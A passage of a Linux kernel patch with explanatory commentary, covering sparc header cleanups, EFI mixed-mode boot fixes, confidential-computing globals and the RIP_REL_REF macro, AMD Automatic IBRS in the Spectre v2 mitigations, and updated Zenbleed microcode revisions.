+diff --git a/arch/sparc/kernel/pci_msi.c b/arch/sparc/kernel/pci_msi.c
+index 9ed11985768e1..fc7402948b7bc 100644
+--- a/arch/sparc/kernel/pci_msi.c
++++ b/arch/sparc/kernel/pci_msi.c
+@@ -5,6 +5,8 @@
+  */
+ #include <linux/kernel.h>
+ #include <linux/interrupt.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ #include <linux/slab.h>
+ #include <linux/irq.h>
+ 
+diff --git a/arch/sparc/kernel/pci_psycho.c b/arch/sparc/kernel/pci_psycho.c
+index f413371da3871..1efc98305ec76 100644
+--- a/arch/sparc/kernel/pci_psycho.c
++++ b/arch/sparc/kernel/pci_psycho.c
+@@ -13,7 +13,9 @@
+ #include <linux/export.h>
+ #include <linux/slab.h>
+ #include <linux/interrupt.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/iommu.h>
+ #include <asm/irq.h>
+diff --git a/arch/sparc/kernel/pci_sun4v.c b/arch/sparc/kernel/pci_sun4v.c
+index 3844809718052..0ddef827e0f99 100644
+--- a/arch/sparc/kernel/pci_sun4v.c
++++ b/arch/sparc/kernel/pci_sun4v.c
+@@ -15,7 +15,8 @@
+ #include <linux/msi.h>
+ #include <linux/export.h>
+ #include <linux/log2.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ #include <linux/dma-map-ops.h>
+ #include <asm/iommu-common.h>
+ 
+diff --git a/arch/sparc/kernel/pmc.c b/arch/sparc/kernel/pmc.c
+index b5c1eb33b9518..69a0206e56f01 100644
+--- a/arch/sparc/kernel/pmc.c
++++ b/arch/sparc/kernel/pmc.c
+@@ -11,7 +11,7 @@
+ #include <linux/init.h>
+ #include <linux/pm.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/platform_device.h>
+ #include <linux/module.h>
+ 
+ #include <asm/io.h>
+diff --git a/arch/sparc/kernel/power.c b/arch/sparc/kernel/power.c
+index d941875dd7186..2f6c909e1755d 100644
+--- a/arch/sparc/kernel/power.c
++++ b/arch/sparc/kernel/power.c
+@@ -9,7 +9,8 @@
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+ #include <linux/reboot.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/prom.h>
+ #include <asm/io.h>
+diff --git a/arch/sparc/kernel/prom_irqtrans.c b/arch/sparc/kernel/prom_irqtrans.c
+index 28aff1c524b58..426bd08cb2ab1 100644
+--- a/arch/sparc/kernel/prom_irqtrans.c
++++ b/arch/sparc/kernel/prom_irqtrans.c
+@@ -4,6 +4,7 @@
+ #include <linux/init.h>
+ #include <linux/of.h>
+ #include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/oplib.h>
+ #include <asm/prom.h>
+diff --git a/arch/sparc/kernel/psycho_common.c b/arch/sparc/kernel/psycho_common.c
+index e90bcb6bad7fc..5ee74b4c0cf40 100644
+--- a/arch/sparc/kernel/psycho_common.c
++++ b/arch/sparc/kernel/psycho_common.c
+@@ -6,6 +6,7 @@
+ #include <linux/kernel.h>
+ #include <linux/interrupt.h>
+ #include <linux/numa.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/upa.h>
+ 
+diff --git a/arch/sparc/kernel/sbus.c b/arch/sparc/kernel/sbus.c
+index 32141e1006c4a..0bababf6f2bcd 100644
+--- a/arch/sparc/kernel/sbus.c
++++ b/arch/sparc/kernel/sbus.c
+@@ -14,7 +14,8 @@
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <linux/numa.h>
+ 
+ #include <asm/page.h>
+diff --git a/arch/sparc/kernel/time_32.c b/arch/sparc/kernel/time_32.c
+index 8a08830e4a653..79934beba03a6 100644
+--- a/arch/sparc/kernel/time_32.c
++++ b/arch/sparc/kernel/time_32.c
+@@ -33,7 +33,6 @@
+ #include <linux/ioport.h>
+ #include <linux/profile.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
+ #include <linux/platform_device.h>
+ 
+ #include <asm/mc146818rtc.h>
+diff --git a/arch/sparc/mm/io-unit.c b/arch/sparc/mm/io-unit.c
+index bf3e6d2fe5d94..3afbbe5fba46b 100644
+--- a/arch/sparc/mm/io-unit.c
++++ b/arch/sparc/mm/io-unit.c
+@@ -13,7 +13,8 @@
+ #include <linux/bitops.h>
+ #include <linux/dma-map-ops.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/io.h>
+ #include <asm/io-unit.h>
+diff --git a/arch/sparc/mm/iommu.c b/arch/sparc/mm/iommu.c
+index 9e3f6933ca13f..14e178bfe33ab 100644
+--- a/arch/sparc/mm/iommu.c
++++ b/arch/sparc/mm/iommu.c
+@@ -7,14 +7,15 @@
+  * Copyright (C) 1996 Eddie C. Dost    (ecd@skynet.be)
+  * Copyright (C) 1997,1998 Jakub Jelinek    (jj@sunsite.mff.cuni.cz)
+  */
+- 
++
+ #include <linux/kernel.h>
+ #include <linux/init.h>
+ #include <linux/mm.h>
+ #include <linux/slab.h>
+ #include <linux/dma-map-ops.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/io.h>
+ #include <asm/mxcc.h>
+diff --git a/arch/sparc/vdso/vma.c b/arch/sparc/vdso/vma.c
+index ae9a86cb6f3d9..2b97df0850aa7 100644
+--- a/arch/sparc/vdso/vma.c
++++ b/arch/sparc/vdso/vma.c
+@@ -449,9 +449,8 @@ static __init int vdso_setup(char *s)
+ 	unsigned long val;
+ 
+ 	err = kstrtoul(s, 10, &val);
+-	if (err)
+-		return err;
+-	vdso_enabled = val;
+-	return 0;
++	if (!err)
++		vdso_enabled = val;
++	return 1;
+ }
+ __setup("vdso=", vdso_setup);
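Same __setup() return-value fix as the sparc nmi_watchdog= handler above: always return 1 so "vdso=" is consumed, and simply leave vdso_enabled untouched when kstrtoul() fails, since the error code previously returned was never treated as an error anyway.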
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index 5caa023e98397..bea53385d31e3 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -1553,19 +1553,6 @@ config AMD_MEM_ENCRYPT
+ 	  This requires an AMD processor that supports Secure Memory
+ 	  Encryption (SME).
+ 
+-config AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT
+-	bool "Activate AMD Secure Memory Encryption (SME) by default"
+-	depends on AMD_MEM_ENCRYPT
+-	help
+-	  Say yes to have system memory encrypted by default if running on
+-	  an AMD processor that supports Secure Memory Encryption (SME).
+-
+-	  If set to Y, then the encryption of system memory can be
+-	  deactivated with the mem_encrypt=off command line option.
+-
+-	  If set to N, then the encryption of system memory can be
+-	  activated with the mem_encrypt=on command line option.
+-
+ # Common NUMA Features
+ config NUMA
+ 	bool "NUMA Memory Allocation and Scheduler Support"
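Dropping AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT removes the build-time toggle entirely: SME activation is now controlled solely at runtime by the mem_encrypt= command-line option, so a kernel built with AMD_MEM_ENCRYPT no longer encrypts system memory unless mem_encrypt=on is passed.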
+diff --git a/arch/x86/boot/compressed/efi_mixed.S b/arch/x86/boot/compressed/efi_mixed.S
+index 8232c5b2a9bf5..fb6d60dcd6ed1 100644
+--- a/arch/x86/boot/compressed/efi_mixed.S
++++ b/arch/x86/boot/compressed/efi_mixed.S
+@@ -15,10 +15,12 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <asm/asm-offsets.h>
+ #include <asm/msr.h>
+ #include <asm/page_types.h>
+ #include <asm/processor-flags.h>
+ #include <asm/segment.h>
++#include <asm/setup.h>
+ 
+ 	.code64
+ 	.text
+@@ -49,6 +51,11 @@ SYM_FUNC_START(startup_64_mixed_mode)
+ 	lea	efi32_boot_args(%rip), %rdx
+ 	mov	0(%rdx), %edi
+ 	mov	4(%rdx), %esi
++
++	/* Switch to the firmware's stack */
++	movl	efi32_boot_sp(%rip), %esp
++	andl	$~7, %esp
++
+ #ifdef CONFIG_EFI_HANDOVER_PROTOCOL
+ 	mov	8(%rdx), %edx		// saved bootparams pointer
+ 	test	%edx, %edx
+@@ -150,6 +157,7 @@ SYM_FUNC_END(__efi64_thunk)
+ SYM_FUNC_START(efi32_stub_entry)
+ 	call	1f
+ 1:	popl	%ecx
++	leal	(efi32_boot_args - 1b)(%ecx), %ebx
+ 
+ 	/* Clear BSS */
+ 	xorl	%eax, %eax
+@@ -164,6 +172,7 @@ SYM_FUNC_START(efi32_stub_entry)
+ 	popl	%ecx
+ 	popl	%edx
+ 	popl	%esi
++	movl	%esi, 8(%ebx)
+ 	jmp	efi32_entry
+ SYM_FUNC_END(efi32_stub_entry)
+ #endif
+@@ -240,8 +249,6 @@ SYM_FUNC_END(efi_enter32)
+  *
+  * Arguments:	%ecx	image handle
+  * 		%edx	EFI system table pointer
+- *		%esi	struct bootparams pointer (or NULL when not using
+- *			the EFI handover protocol)
+  *
+  * Since this is the point of no return for ordinary execution, no registers
+  * are considered live except for the function parameters. [Note that the EFI
+@@ -260,13 +267,25 @@ SYM_FUNC_START_LOCAL(efi32_entry)
+ 	/* Store firmware IDT descriptor */
+ 	sidtl	(efi32_boot_idt - 1b)(%ebx)
+ 
++	/* Store firmware stack pointer */
++	movl	%esp, (efi32_boot_sp - 1b)(%ebx)
++
+ 	/* Store boot arguments */
+ 	leal	(efi32_boot_args - 1b)(%ebx), %ebx
+ 	movl	%ecx, 0(%ebx)
+ 	movl	%edx, 4(%ebx)
+-	movl	%esi, 8(%ebx)
+ 	movb	$0x0, 12(%ebx)          // efi_is64
+ 
++	/*
++	 * Allocate some memory for a temporary struct boot_params, which only
++	 * needs the minimal pieces that startup_32() relies on.
++	 */
++	subl	$PARAM_SIZE, %esp
++	movl	%esp, %esi
++	movl	$PAGE_SIZE, BP_kernel_alignment(%esi)
++	movl	$_end - 1b, BP_init_size(%esi)
++	subl	$startup_32 - 1b, BP_init_size(%esi)
++
+ 	/* Disable paging */
+ 	movl	%cr0, %eax
+ 	btrl	$X86_CR0_PG_BIT, %eax
+@@ -292,8 +311,7 @@ SYM_FUNC_START(efi32_pe_entry)
+ 
+ 	movl	8(%ebp), %ecx			// image_handle
+ 	movl	12(%ebp), %edx			// sys_table
+-	xorl	%esi, %esi
+-	jmp	efi32_entry			// pass %ecx, %edx, %esi
++	jmp	efi32_entry			// pass %ecx, %edx
+ 						// no other registers remain live
+ 
+ 2:	popl	%edi				// restore callee-save registers
+@@ -324,5 +342,6 @@ SYM_DATA_END(efi32_boot_idt)
+ 
+ SYM_DATA_LOCAL(efi32_boot_cs, .word 0)
+ SYM_DATA_LOCAL(efi32_boot_ds, .word 0)
++SYM_DATA_LOCAL(efi32_boot_sp, .long 0)
+ SYM_DATA_LOCAL(efi32_boot_args, .long 0, 0, 0)
+ SYM_DATA(efi_is64, .byte 1)
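Two related mixed-mode fixes above: efi32_entry now records the firmware stack pointer (efi32_boot_sp) so startup_64_mixed_mode can switch back onto the firmware's stack, and rather than threading a possibly-NULL boot_params pointer through %esi, the 32-bit entry fabricates a minimal struct boot_params in the PARAM_SIZE stack reservation with just the fields startup_32 consumes. In rough C terms (a sketch; the real code does this via asm-offsets):

    /* Sketch only: what the PARAM_SIZE stack allocation is filled with. */
    struct boot_params bp = { 0 };
    bp.hdr.kernel_alignment = PAGE_SIZE;
    bp.hdr.init_size        = _end - startup_32;  /* run-time footprint */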
+diff --git a/arch/x86/coco/core.c b/arch/x86/coco/core.c
+index 49b44f8814846..1d3ad275c3664 100644
+--- a/arch/x86/coco/core.c
++++ b/arch/x86/coco/core.c
+@@ -13,8 +13,8 @@
+ #include <asm/coco.h>
+ #include <asm/processor.h>
+ 
+-static enum cc_vendor vendor __ro_after_init;
+-static u64 cc_mask __ro_after_init;
++enum cc_vendor cc_vendor __ro_after_init = CC_VENDOR_NONE;
++u64 cc_mask __ro_after_init;
+ 
+ static bool intel_cc_platform_has(enum cc_attr attr)
+ {
+@@ -83,7 +83,7 @@ static bool hyperv_cc_platform_has(enum cc_attr attr)
+ 
+ bool cc_platform_has(enum cc_attr attr)
+ {
+-	switch (vendor) {
++	switch (cc_vendor) {
+ 	case CC_VENDOR_AMD:
+ 		return amd_cc_platform_has(attr);
+ 	case CC_VENDOR_INTEL:
+@@ -105,7 +105,7 @@ u64 cc_mkenc(u64 val)
+ 	 * - for AMD, bit *set* means the page is encrypted
+ 	 * - for Intel *clear* means encrypted.
+ 	 */
+-	switch (vendor) {
++	switch (cc_vendor) {
+ 	case CC_VENDOR_AMD:
+ 		return val | cc_mask;
+ 	case CC_VENDOR_INTEL:
+@@ -118,7 +118,7 @@ u64 cc_mkenc(u64 val)
+ u64 cc_mkdec(u64 val)
+ {
+ 	/* See comment in cc_mkenc() */
+-	switch (vendor) {
++	switch (cc_vendor) {
+ 	case CC_VENDOR_AMD:
+ 		return val & ~cc_mask;
+ 	case CC_VENDOR_INTEL:
+@@ -128,13 +128,3 @@ u64 cc_mkdec(u64 val)
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(cc_mkdec);
+-
+-__init void cc_set_vendor(enum cc_vendor v)
+-{
+-	vendor = v;
+-}
+-
+-__init void cc_set_mask(u64 mask)
+-{
+-	cc_mask = mask;
+-}
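cc_vendor and cc_mask stop hiding behind __init setter functions and become ordinary globals (cc_vendor with an explicit CC_VENDOR_NONE initializer). That lets very early code, including code that runs before relocation, assign them directly; cc_set_mask() survives as an inline that writes through RIP_REL_REF(), introduced in the asm.h hunk below.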
+diff --git a/arch/x86/coco/tdx/tdx.c b/arch/x86/coco/tdx/tdx.c
+index d0565a9e7d8c9..4692450aeb4d3 100644
+--- a/arch/x86/coco/tdx/tdx.c
++++ b/arch/x86/coco/tdx/tdx.c
+@@ -793,7 +793,7 @@ void __init tdx_early_init(void)
+ 
+ 	setup_force_cpu_cap(X86_FEATURE_TDX_GUEST);
+ 
+-	cc_set_vendor(CC_VENDOR_INTEL);
++	cc_vendor = CC_VENDOR_INTEL;
+ 	tdx_parse_tdinfo(&cc_mask);
+ 	cc_set_mask(cc_mask);
+ 
+diff --git a/arch/x86/include/asm/asm.h b/arch/x86/include/asm/asm.h
+index fbcfec4dc4ccd..ca8eed1d496ab 100644
+--- a/arch/x86/include/asm/asm.h
++++ b/arch/x86/include/asm/asm.h
+@@ -113,6 +113,20 @@
+ 
+ #endif
+ 
++#ifndef __ASSEMBLY__
++#ifndef __pic__
++static __always_inline __pure void *rip_rel_ptr(void *p)
++{
++	asm("leaq %c1(%%rip), %0" : "=r"(p) : "i"(p));
++
++	return p;
++}
++#define RIP_REL_REF(var)	(*(typeof(&(var)))rip_rel_ptr(&(var)))
++#else
++#define RIP_REL_REF(var)	(var)
++#endif
++#endif
++
+ /*
+  * Macros to generate condition code outputs from inline assembly,
+  * The output operand must be type "bool".
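RIP_REL_REF() forces a RIP-relative access to a global. Early boot code (the SEV/SME setup paths, for instance) executes before kernel relocations are processed, so an absolute reference can resolve to the link-time address rather than where the code actually runs; a RIP-relative lea always lands on the live copy. The __pic__ branch compiles to a plain access because PIC code generation is RIP-relative already. Intended usage, as a sketch:

    u64 mask = RIP_REL_REF(cc_mask);          /* read the live copy   */
    RIP_REL_REF(cc_mask) = mask | new_bit;    /* write it (new_bit is
                                                 a placeholder here)  */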
+diff --git a/arch/x86/include/asm/coco.h b/arch/x86/include/asm/coco.h
+index 3d98c3a60d34f..60bb26097da1a 100644
+--- a/arch/x86/include/asm/coco.h
++++ b/arch/x86/include/asm/coco.h
+@@ -2,6 +2,7 @@
+ #ifndef _ASM_X86_COCO_H
+ #define _ASM_X86_COCO_H
+ 
++#include <asm/asm.h>
+ #include <asm/types.h>
+ 
+ enum cc_vendor {
+@@ -11,10 +12,15 @@ enum cc_vendor {
+ 	CC_VENDOR_INTEL,
+ };
+ 
+-void cc_set_vendor(enum cc_vendor v);
+-void cc_set_mask(u64 mask);
++extern enum cc_vendor cc_vendor;
++extern u64 cc_mask;
+ 
+ #ifdef CONFIG_ARCH_HAS_CC_PLATFORM
++static inline void cc_set_mask(u64 mask)
++{
++	RIP_REL_REF(cc_mask) = mask;
++}
++
+ u64 cc_mkenc(u64 val);
+ u64 cc_mkdec(u64 val);
+ #else
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index b97a70aa4de90..9a157942ae3dd 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -427,6 +427,7 @@
+ #define X86_FEATURE_V_TSC_AUX		(19*32+ 9) /* "" Virtual TSC_AUX */
+ #define X86_FEATURE_SME_COHERENT	(19*32+10) /* "" AMD hardware-enforced cache coherency */
+ 
++#define X86_FEATURE_AUTOIBRS		(20*32+ 8) /* "" Automatic IBRS */
+ #define X86_FEATURE_SBPB		(20*32+27) /* "" Selective Branch Prediction Barrier */
+ #define X86_FEATURE_IBPB_BRTYPE		(20*32+28) /* "" MSR_PRED_CMD[IBPB] flushes all branch type predictions */
+ #define X86_FEATURE_SRSO_NO		(20*32+29) /* "" CPU is not affected by SRSO */
+diff --git a/arch/x86/include/asm/mem_encrypt.h b/arch/x86/include/asm/mem_encrypt.h
+index c91326593e741..41d06822bc8cd 100644
+--- a/arch/x86/include/asm/mem_encrypt.h
++++ b/arch/x86/include/asm/mem_encrypt.h
+@@ -15,7 +15,8 @@
+ #include <linux/init.h>
+ #include <linux/cc_platform.h>
+ 
+-#include <asm/bootparam.h>
++#include <asm/asm.h>
++struct boot_params;
+ 
+ #ifdef CONFIG_X86_MEM_ENCRYPT
+ void __init mem_encrypt_init(void);
+@@ -57,6 +58,11 @@ void __init mem_encrypt_free_decrypted_mem(void);
+ 
+ void __init sev_es_init_vc_handling(void);
+ 
++static inline u64 sme_get_me_mask(void)
++{
++	return RIP_REL_REF(sme_me_mask);
++}
++
+ #define __bss_decrypted __section(".bss..decrypted")
+ 
+ #else	/* !CONFIG_AMD_MEM_ENCRYPT */
+@@ -88,6 +94,8 @@ early_set_mem_enc_dec_hypercall(unsigned long vaddr, unsigned long size, bool en
+ 
+ static inline void mem_encrypt_free_decrypted_mem(void) { }
+ 
++static inline u64 sme_get_me_mask(void) { return 0; }
++
+ #define __bss_decrypted
+ 
+ #endif	/* CONFIG_AMD_MEM_ENCRYPT */
+@@ -105,11 +113,6 @@ void add_encrypt_protection_map(void);
+ 
+ extern char __start_bss_decrypted[], __end_bss_decrypted[], __start_bss_decrypted_unused[];
+ 
+-static inline u64 sme_get_me_mask(void)
+-{
+-	return sme_me_mask;
+-}
+-
+ #endif	/* __ASSEMBLY__ */
+ 
+ #endif	/* __X86_MEM_ENCRYPT_H__ */
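sme_get_me_mask() moves inside the CONFIG_AMD_MEM_ENCRYPT block, reads sme_me_mask through RIP_REL_REF(), and gains a stub returning 0 for builds without AMD_MEM_ENCRYPT, so early callers need no ifdefs. The <asm/bootparam.h> include is replaced by a forward declaration of struct boot_params to keep the header light.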
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 005e41dc7ee5a..33a19ef23644d 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -30,6 +30,7 @@
+ #define _EFER_SVME		12 /* Enable virtualization */
+ #define _EFER_LMSLE		13 /* Long Mode Segment Limit Enable */
+ #define _EFER_FFXSR		14 /* Enable Fast FXSAVE/FXRSTOR */
++#define _EFER_AUTOIBRS		21 /* Enable Automatic IBRS */
+ 
+ #define EFER_SCE		(1<<_EFER_SCE)
+ #define EFER_LME		(1<<_EFER_LME)
+@@ -38,6 +39,7 @@
+ #define EFER_SVME		(1<<_EFER_SVME)
+ #define EFER_LMSLE		(1<<_EFER_LMSLE)
+ #define EFER_FFXSR		(1<<_EFER_FFXSR)
++#define EFER_AUTOIBRS		(1<<_EFER_AUTOIBRS)
+ 
+ /* Intel MSRs. Some also available on other CPUs */
+ 
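EFER bit 21 is AMD's Automatic IBRS: once set, the processor provides IBRS-equivalent protection for kernel-mode code without the per-entry SPEC_CTRL MSR writes that classic IBRS costs. The bugs.c hunk below enables it with msr_set_bit(MSR_EFER, _EFER_AUTOIBRS) when the feature bit is present.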
+diff --git a/arch/x86/include/asm/sev.h b/arch/x86/include/asm/sev.h
+index cf98fc28601fb..c57dd21155bd7 100644
+--- a/arch/x86/include/asm/sev.h
++++ b/arch/x86/include/asm/sev.h
+@@ -196,12 +196,12 @@ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long padd
+ 					 unsigned long npages);
+ void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr,
+ 					unsigned long npages);
+-void __init snp_prep_memory(unsigned long paddr, unsigned int sz, enum psc_op op);
+ void snp_set_memory_shared(unsigned long vaddr, unsigned long npages);
+ void snp_set_memory_private(unsigned long vaddr, unsigned long npages);
+ void snp_set_wakeup_secondary_cpu(void);
+ bool snp_init(struct boot_params *bp);
+ void __init __noreturn snp_abort(void);
++void snp_dmi_setup(void);
+ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio);
+ u64 snp_get_unsupported_features(u64 status);
+ u64 sev_get_status(void);
+@@ -219,12 +219,12 @@ static inline void __init
+ early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr, unsigned long npages) { }
+ static inline void __init
+ early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr, unsigned long npages) { }
+-static inline void __init snp_prep_memory(unsigned long paddr, unsigned int sz, enum psc_op op) { }
+ static inline void snp_set_memory_shared(unsigned long vaddr, unsigned long npages) { }
+ static inline void snp_set_memory_private(unsigned long vaddr, unsigned long npages) { }
+ static inline void snp_set_wakeup_secondary_cpu(void) { }
+ static inline bool snp_init(struct boot_params *bp) { return false; }
+ static inline void snp_abort(void) { }
++static inline void snp_dmi_setup(void) { }
+ static inline int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio)
+ {
+ 	return -ENOTTY;
+diff --git a/arch/x86/include/asm/suspend_32.h b/arch/x86/include/asm/suspend_32.h
+index a800abb1a9925..d8416b3bf832e 100644
+--- a/arch/x86/include/asm/suspend_32.h
++++ b/arch/x86/include/asm/suspend_32.h
+@@ -12,11 +12,6 @@
+ 
+ /* image of the saved processor state */
+ struct saved_context {
+-	/*
+-	 * On x86_32, all segment registers except gs are saved at kernel
+-	 * entry in pt_regs.
+-	 */
+-	u16 gs;
+ 	unsigned long cr0, cr2, cr3, cr4;
+ 	u64 misc_enable;
+ 	struct saved_msrs saved_msrs;
+@@ -27,6 +22,11 @@ struct saved_context {
+ 	unsigned long tr;
+ 	unsigned long safety;
+ 	unsigned long return_address;
++	/*
++	 * On x86_32, all segment registers except gs are saved at kernel
++	 * entry in pt_regs.
++	 */
++	u16 gs;
+ 	bool misc_enable_saved;
+ } __attribute__((packed));
+ 
+diff --git a/arch/x86/include/asm/x86_init.h b/arch/x86/include/asm/x86_init.h
+index 034e62838b284..c3e910b1d5a25 100644
+--- a/arch/x86/include/asm/x86_init.h
++++ b/arch/x86/include/asm/x86_init.h
+@@ -30,12 +30,13 @@ struct x86_init_mpparse {
+  * @reserve_resources:		reserve the standard resources for the
+  *				platform
+  * @memory_setup:		platform specific memory setup
+- *
++ * @dmi_setup:			platform specific DMI setup
+  */
+ struct x86_init_resources {
+ 	void (*probe_roms)(void);
+ 	void (*reserve_resources)(void);
+ 	char *(*memory_setup)(void);
++	void (*dmi_setup)(void);
+ };
+ 
+ /**
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index c1d09c8844d67..425092806f8fe 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -997,11 +997,11 @@ static bool cpu_has_zenbleed_microcode(void)
+ 	u32 good_rev = 0;
+ 
+ 	switch (boot_cpu_data.x86_model) {
+-	case 0x30 ... 0x3f: good_rev = 0x0830107a; break;
+-	case 0x60 ... 0x67: good_rev = 0x0860010b; break;
+-	case 0x68 ... 0x6f: good_rev = 0x08608105; break;
+-	case 0x70 ... 0x7f: good_rev = 0x08701032; break;
+-	case 0xa0 ... 0xaf: good_rev = 0x08a00008; break;
++	case 0x30 ... 0x3f: good_rev = 0x0830107b; break;
++	case 0x60 ... 0x67: good_rev = 0x0860010c; break;
++	case 0x68 ... 0x6f: good_rev = 0x08608107; break;
++	case 0x70 ... 0x7f: good_rev = 0x08701033; break;
++	case 0xa0 ... 0xaf: good_rev = 0x08a00009; break;
+ 
+ 	default:
+ 		return false;
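The per-model good_rev values each tick up by one or two: the Zenbleed table is updated to the microcode revisions that actually carry the fix, so CPUs on the previously accepted revisions correctly fall back to the chicken-bit mitigation.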
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index c68789fdc123b..e3fec47a800bf 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -1354,19 +1354,21 @@ spectre_v2_user_select_mitigation(void)
+ 	}
+ 
+ 	/*
+-	 * If no STIBP, enhanced IBRS is enabled, or SMT impossible, STIBP
++	 * If no STIBP, Intel enhanced IBRS is enabled, or SMT impossible, STIBP
+ 	 * is not required.
+ 	 *
+-	 * Enhanced IBRS also protects against cross-thread branch target
++	 * Intel's Enhanced IBRS also protects against cross-thread branch target
+ 	 * injection in user-mode as the IBRS bit remains always set which
+ 	 * implicitly enables cross-thread protections.  However, in legacy IBRS
+ 	 * mode, the IBRS bit is set only on kernel entry and cleared on return
+-	 * to userspace. This disables the implicit cross-thread protection,
+-	 * so allow for STIBP to be selected in that case.
++	 * to userspace.  AMD Automatic IBRS also does not protect userspace.
++	 * These modes therefore disable the implicit cross-thread protection,
++	 * so allow for STIBP to be selected in those cases.
+ 	 */
+ 	if (!boot_cpu_has(X86_FEATURE_STIBP) ||
+ 	    !smt_possible ||
+-	    spectre_v2_in_eibrs_mode(spectre_v2_enabled))
++	    (spectre_v2_in_eibrs_mode(spectre_v2_enabled) &&
++	     !boot_cpu_has(X86_FEATURE_AUTOIBRS)))
+ 		return;
+ 
+ 	/*
+@@ -1396,9 +1398,9 @@ static const char * const spectre_v2_strings[] = {
+ 	[SPECTRE_V2_NONE]			= "Vulnerable",
+ 	[SPECTRE_V2_RETPOLINE]			= "Mitigation: Retpolines",
+ 	[SPECTRE_V2_LFENCE]			= "Mitigation: LFENCE",
+-	[SPECTRE_V2_EIBRS]			= "Mitigation: Enhanced IBRS",
+-	[SPECTRE_V2_EIBRS_LFENCE]		= "Mitigation: Enhanced IBRS + LFENCE",
+-	[SPECTRE_V2_EIBRS_RETPOLINE]		= "Mitigation: Enhanced IBRS + Retpolines",
++	[SPECTRE_V2_EIBRS]			= "Mitigation: Enhanced / Automatic IBRS",
++	[SPECTRE_V2_EIBRS_LFENCE]		= "Mitigation: Enhanced / Automatic IBRS + LFENCE",
++	[SPECTRE_V2_EIBRS_RETPOLINE]		= "Mitigation: Enhanced / Automatic IBRS + Retpolines",
+ 	[SPECTRE_V2_IBRS]			= "Mitigation: IBRS",
+ };
+ 
+@@ -1467,7 +1469,7 @@ static enum spectre_v2_mitigation_cmd __init spectre_v2_parse_cmdline(void)
+ 	     cmd == SPECTRE_V2_CMD_EIBRS_LFENCE ||
+ 	     cmd == SPECTRE_V2_CMD_EIBRS_RETPOLINE) &&
+ 	    !boot_cpu_has(X86_FEATURE_IBRS_ENHANCED)) {
+-		pr_err("%s selected but CPU doesn't have eIBRS. Switching to AUTO select\n",
++		pr_err("%s selected but CPU doesn't have Enhanced or Automatic IBRS. Switching to AUTO select\n",
+ 		       mitigation_options[i].option);
+ 		return SPECTRE_V2_CMD_AUTO;
+ 	}
+@@ -1652,8 +1654,12 @@ static void __init spectre_v2_select_mitigation(void)
+ 		pr_err(SPECTRE_V2_EIBRS_EBPF_MSG);
+ 
+ 	if (spectre_v2_in_ibrs_mode(mode)) {
+-		x86_spec_ctrl_base |= SPEC_CTRL_IBRS;
+-		update_spec_ctrl(x86_spec_ctrl_base);
++		if (boot_cpu_has(X86_FEATURE_AUTOIBRS)) {
++			msr_set_bit(MSR_EFER, _EFER_AUTOIBRS);
++		} else {
++			x86_spec_ctrl_base |= SPEC_CTRL_IBRS;
++			update_spec_ctrl(x86_spec_ctrl_base);
++		}
+ 	}
+ 
+ 	switch (mode) {
+@@ -1737,8 +1743,8 @@ static void __init spectre_v2_select_mitigation(void)
+ 	/*
+ 	 * Retpoline protects the kernel, but doesn't protect firmware.  IBRS
+ 	 * and Enhanced IBRS protect firmware too, so enable IBRS around
+-	 * firmware calls only when IBRS / Enhanced IBRS aren't otherwise
+-	 * enabled.
++	 * firmware calls only when IBRS / Enhanced / Automatic IBRS aren't
++	 * otherwise enabled.
+ 	 *
+ 	 * Use "mode" to check Enhanced IBRS instead of boot_cpu_has(), because
+ 	 * the user might select retpoline on the kernel command line and if
+@@ -2568,74 +2574,74 @@ static const char * const l1tf_vmx_states[] = {
+ static ssize_t l1tf_show_state(char *buf)
+ {
+ 	if (l1tf_vmx_mitigation == VMENTER_L1D_FLUSH_AUTO)
+-		return sprintf(buf, "%s\n", L1TF_DEFAULT_MSG);
++		return sysfs_emit(buf, "%s\n", L1TF_DEFAULT_MSG);
+ 
+ 	if (l1tf_vmx_mitigation == VMENTER_L1D_FLUSH_EPT_DISABLED ||
